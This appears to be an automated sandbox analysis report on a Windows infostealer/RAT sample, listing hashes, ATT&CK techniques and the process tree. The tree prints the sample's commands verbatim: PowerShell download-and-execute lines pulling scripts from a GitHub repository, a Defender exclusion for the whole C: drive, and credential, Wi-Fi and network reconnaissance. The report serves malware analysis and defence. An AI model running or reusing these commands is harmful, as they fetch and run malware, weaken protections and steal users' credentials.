Resubmissions
18/08/2024, 23:39
240818-3nplcavclq 1018/08/2024, 23:37
240818-3maqss1ekg 1018/08/2024, 23:21
240818-3b7w6atekq 10Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
18/08/2024, 23:39
General
-
Target
2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe
-
Size
14.0MB
-
MD5
221cb4b58df385e30145f2cda2423c66
-
SHA1
d16756fb4a42d8d32b72f71cd7d2ad20b073d511
-
SHA256
b1722e1e2bed853593c0d32777593a352901f7d4f670bd06dc0af4b9937da2d7
-
SHA512
0bf2e7e714b40706f078210229601f8d6ceeebcf8a89ba123aa38aa3c7b1b493911916cc54ed657bf4bcf8d2a8b6ab4da09148d64000d98bcdcad23aadf00b9c
-
SSDEEP
196608:5sWQx346uoeXYk8TmIhI0bQ+ko9gvK9aXFFT:52xooKZ8TmsI00+kzvfz
Malware Config
Signatures
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Using powershell.exe command.
-
Modifies Windows Firewall 2 TTPs 1 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Network Service Discovery 1 TTPs 1 IoCs
Attempt to gather information on host's network.
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
System Network Connections Discovery 1 TTPs 1 IoCs
Attempt to get a listing of network connections.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Gathers network information 2 TTPs 3 IoCs
Uses commandline utility to view network configuration.
-
Kills process with taskkill 1 IoCs
-
Modifies Control Panel 2 IoCs
-
Modifies registry class 1 IoCs
-
Modifies system certificate store 2 TTPs 8 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of WriteProcessMemory 60 IoCs
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe"C:\Users\Admin\AppData\Local\Temp\2024-08-18_221cb4b58df385e30145f2cda2423c66_poet-rat_snatch.exe"1⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ookkcxho\ookkcxho.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6666.tmp" "c:\Users\Admin\AppData\Local\Temp\ookkcxho\CSCFCAF3C0DF0F1480C845D6643A331FC55.TMP"4⤵
-
-
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" wlan show profiles3⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup administrators3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators4⤵
-
-
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall show allprofiles3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /all3⤵
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" user3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user4⤵
-
-
-
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /displaydns3⤵
- Gathers network information
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup4⤵
-
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" startup get command caption3⤵
-
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -ano3⤵
- System Network Connections Discovery
- Gathers network information
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe3⤵
-
-
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /all3⤵
- Gathers network information
-
-
C:\Windows\system32\ROUTE.EXE"C:\Windows\system32\ROUTE.EXE" print3⤵
-
-
C:\Windows\system32\ARP.EXE"C:\Windows\system32\ARP.EXE" -a3⤵
- Network Service Discovery
-
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" wlan show profile3⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -C "Add-MpPreference -ExclusionPath 'C:'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ontea2qw\ontea2qw.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES66B4.tmp" "c:\Users\Admin\AppData\Local\Temp\ontea2qw\CSCAC67317A22564F56A83757AC8EAB3BB4.TMP"4⤵
-
-
-
-
C:\Windows\system32\cmd.execmd.exe /c start facebook.com2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exePowerShell -Command "(New-Object -ComObject SAPI.SpVoice).Speak(\"hey hey\")"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\attrib.exeattrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps12⤵
- Views/modifies file attributes
-
-
C:\Windows\system32\cmd.execmd /c rundll32.exe user32.dll,SwapMouseButton2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exerundll32.exe user32.dll,SwapMouseButton3⤵
-
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM wallpaper32.exe2⤵
- Kills process with taskkill
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x4fc 0x3e41⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4216,i,16316361669272684588,6171287487746154806,262144 --variations-seed-version --mojo-platform-channel-handle=4076 /prefetch:81⤵
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\System32\3uu4gi.exe"C:\Windows\System32\3uu4gi.exe"1⤵
Network
MITRE ATT&CK Enterprise v15
Persistence
Account Manipulation
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Account Manipulation
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
2Subvert Trust Controls
1Install Root Certificate
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
2Discovery
Browser Information Discovery
1Network Service Discovery
1Peripheral Device Discovery
1Permission Groups Discovery
1Local Groups
1Query Registry
1System Information Discovery
2System Network Configuration Discovery
1Wi-Fi Discovery
1System Network Connections Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1KB
MD5e1567fd9e93d88c7b1c1144280393e83
SHA18b7fb60ed13946307d12158c4f788867e8d2e721
SHA25619ef62498e9c39d9f1beac01f128f4d297d078dbf0741775aafd1f68b9d76338
SHA512bd4487c71381e1054d1fa6465b1414bde5dcff606239aeb07edf838543b0ead3831bb7de93fafa424d8202a080435db8ceeab52a1c9da9caea09a0c50c511dac
-
Filesize
1KB
MD566f4813d57dfd07f67a25f100e0c74ce
SHA1d6c8ea4f02a982d3bc51352b3eb6d183d71a273f
SHA2568c1ed3577f0a865c0adfad588f55f49b825550d66643e685e6ab1701bc2766c0
SHA5121552ed58cba59d11f80839939b6858bb2a56bdb351dc1d0f53aa5426480438d59dceaa6d97d187a6011e9600b6e0848cfb0107c0c07c12017a627c16412bea19
-
Filesize
1KB
MD581677f48aba9a6b97440ff1a8731e486
SHA1fee7e8e685a7c7b5686d09a67e3986a20704aaa9
SHA2568a6adaba5de0c1917a7facc8e1d9f7a53349b9e419ebaf3da99ae1fa4dca0dff
SHA512a1f45bedccf9c50c95fe7418bf5b33dbdf2e31132d6ee21b08a08a89167181c682fe310c609f036a81abab1fba86e1b9e2cd81cbc08877af0f0fe6feafa29479
-
Filesize
1KB
MD53c0e3efb24c8c34e9aaeee36f375e81d
SHA16b12ae8a79546f35f0621150a04f3555581fc1ba
SHA2565cc0b678d1793af3fef750c9726c74f6aae824ad9bff15ab03b8f6bcbe4a4966
SHA51259b3b5ca38e89543faf9b1fc3d9864210ab02619a6a7865a038bc566af3e17f78711c5fea053b9d00997af6cc2fd89ecc7cea2690771d7c1042b123f9e0e4dd9
-
Filesize
213KB
MD50e1c590dbed847306c7e1e07bc637368
SHA1ae16d1cafe68966330842c8bb7f2966a539b6571
SHA2566bac857ceff2748fcff04fc88b8d77ca5bc5bd51f0e9df14050063d104eb8b99
SHA512c06fd38c933a58b140197be50e148c29ad410d230450e011e14c2da0ce7f747f5f56232253637da256273e6233831df624fb2b8f5feec2e4e4910b73cbf424fe
-
Filesize
22KB
MD5fc2b8ccbeeb0ebcb76867a29201c3d64
SHA1cbbd0917da444d41417d39df4b290d1693e09e17
SHA256b173ca9a77569f05a47c60c733d507798f12bd9cc7a5f31e3fe8b2b5ee944e42
SHA5122c28fbafdcc6384d0d1d2fbc56a1fc955b1cda1d2d09537ebfffcd70a12147a6aa5aa4956dba024cad7f51d2af4a0b5fe15ff36e38b2fb05b7d6803bf8da211b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD533b8c5bf1191fa2b03d01f28077fb23b
SHA1d20430eb55f45bd79144e4d544f712c801c7547d
SHA2568054b88841619e58ab63d07fac8fd78590bf3632c3b05c6d306dc412299d4fc7
SHA512884e3e124b985f7961cecea1b63e8ca510393e5925135a952503d531434e7550bc978317dd67ba2900a5919110231a3c28b881abdbd119589648c0797678d678
-
Filesize
4KB
MD5f7213288d5968abf383bc79150802562
SHA1c44f264a3b99822f4cc4b60c9fae60375d9c5545
SHA25628a7395ebadb729642f85220be2b612f2d6a4b517a40e56c12ccf7efbb0534f0
SHA51286cfbf8758895b378cf6d52e2316530088bb7c290e97fa86a784faae4f436894b92106b46eeb7d638d3d495d41ded88a012556e6ff15f789a69f18e15771d628
-
Filesize
2KB
MD59758656bbe8589c66bb241b052490c72
SHA1b73da83fb3ae6b86c6365769a04de9845d5c602c
SHA256e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351
SHA512da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34
-
Filesize
652B
MD5af5aded9f9e050cb15b45d3cc16be9d9
SHA1e7ff1cb6909f7a5a684e7091e92203e68a26ff64
SHA2567b677cf8dae70349ac322d17375a515eb3209739bc204bd4538890eac69dba6c
SHA5124dcbf251398c5b0204bb4c7822bfe3b46d4cb75a1544315a693b12d1c7c8a3f967f49782436a6ebc070c181bac95ed3f99d9f51bbc24e6a0baf28fff43061855
-
Filesize
369B
MD5f2d96b532111fec4886e38c00df6b5d7
SHA14dbd343a3369a19e5c08b7c12632958bf77790b6
SHA256f9f56c764b7c9a703a9708c64aa97360b828f8225de235c9236b579961fb7b6a
SHA5122a22f2eb0873957bb53c4fb68284ebcf100f17d7d486549f15e2111319e42d1f026375b0d7e6282311ed4962d7c935849191c79a00d23cfb71fbbd0aa3562f58
-
Filesize
652B
MD5539724b490de7bae3568bba258861bdb
SHA16eb889047659b9f509d160993456316af275a2ae
SHA256fde387ee196605ab21d1a43b96a3e526776a142645c261ffe3662f1976a5689c
SHA512c9fa7808e8c2a52ac61122d09e75240aed844a2658272e4c1ac50d457c6f1552f225a8ad7e0409179e2f048a52d90c3bfbdf375bbb884d4edb531547134194cc
-
Filesize
1KB
MD58a1e7edb2117ec5dde9a07016905923b
SHA10155dbeeb16333e2eaa767b0209750efee56f47f
SHA256c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007
SHA5124ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21
-
Filesize
369B
MD594d8ed265898b49cad9f90c27438388c
SHA1af71ce72076977ff56494224ebb2556163d1d7b7
SHA25673dae301641df13e664ed268adaaae3db403bb1dde5d7f8a50f1f45d1c810d64
SHA512d6f2cd783d1dfd4cc5cf3ccfee127c7816cb473a0ffad84598301ab14e507f73f4877186b0395c0ed30489f59811618780da11014e2ff19fdb1b57722b713d41
-
Filesize
10.8MB
-
Filesize
32KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
7.6MB
-
Filesize
10.8MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
144KB
-
Filesize
40KB
-
Filesize
72KB
-
Filesize
32KB
-
Filesize
168KB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
10.8MB